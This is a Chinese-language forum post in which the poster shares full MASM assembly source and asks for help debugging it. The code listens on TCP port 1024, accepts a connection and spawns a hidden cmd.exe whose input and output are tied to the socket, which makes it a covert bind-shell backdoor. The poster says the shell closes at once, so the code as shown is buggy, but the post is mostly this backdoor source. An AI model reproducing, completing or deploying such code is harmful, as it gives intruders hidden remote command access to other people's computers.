|
|
楼主 |
发表于 2020-12-21 00:15:02
|
显示全部楼层
"用pipe就可以了。msdn有完整的源代码。"
如果利用管道的话,那么套接字就只能是socket。现在我用了WSASocket,为的是要弄清楚cmd的转向输出...
在调用CreateProcess执行cmd,然后在进程附加信息中把accept()返回的句柄赋给hStdInput,hStdOutput,hStdError。理论上是这样,不过我写代码编译的时候是cmd执行了,但一闪又不见了。用OD看了一下,设置单步步过等也没发现啥错误。我希望能够一起讨论一下,我写的完整代码如下:
.386P
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include wsock32.inc
include Ws2_32.inc
includelib user32.lib
includelib kernel32.lib
includelib wsock32.lib
includelib Ws2_32.lib
TCP_PORT equ 1024 ;常量定义
.data
szCommand db 'cmd.exe',0
.data?
hScoket SOCKET ?
hScoketOther SOCKET ?
szBuffer db MAX_PATH dup(?)
dwSize DWORD ?
.code
_ProcessMain proc
local @wsaData:WSADATA
local @hScoket:SOCKET
local @stAddr:sockaddr_in
local stStartUp:STARTUPINFO
local stProcInfo:PROCESS_INFORMATION
invoke WSAStartup,0202H,addr @wsaData ;初始化WSAStartup库
mov @stAddr.sin_family,AF_INET ;设置IP格式
invoke htons,TCP_PORT ;设置端口
mov @stAddr.sin_port,ax ;保存
mov @stAddr.sin_addr,INADDR_ANY ;设置IP地址
invoke WSASocket,AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0 ;加载套接字
mov hScoket,eax ;保存句柄
invoke bind,hScoket,addr @stAddr,sizeof sockaddr_in ;绑定
.if eax == SOCKET_ERROR
mov eax,FALSE
ret
.endif
invoke listen,hScoket,5 ;开始监听,默认连接5个
invoke accept,hScoket,NULL,NULL ;如果有客户端连接,马上确定
.if eax != INVALID_SOCKET
mov hScoketOther,eax
.endif
invoke GetStartupInfo,addr stStartUp
mov ebx,hScoketOther
mov stStartUp.hStdInput,ebx ;为STARTUPINFO的结构成员赋值,让cmd转向输出。这个值是accept()返回的句柄
mov stStartUp.hStdOutput,ebx
mov stStartUp.hStdError,ebx
mov stStartUp.dwFlags,STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
mov stStartUp.wShowWindow,SW_HIDE
invoke CreateProcess,NULL,addr szCommand,NULL,NULL,\
NULL,NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo ;将结果载入并执行cmd
ret
_ProcessMain endp
start:
invoke _ProcessMain
invoke ExitProcess,NULL
end start |
|
发表于 2020-12-20 21:15:01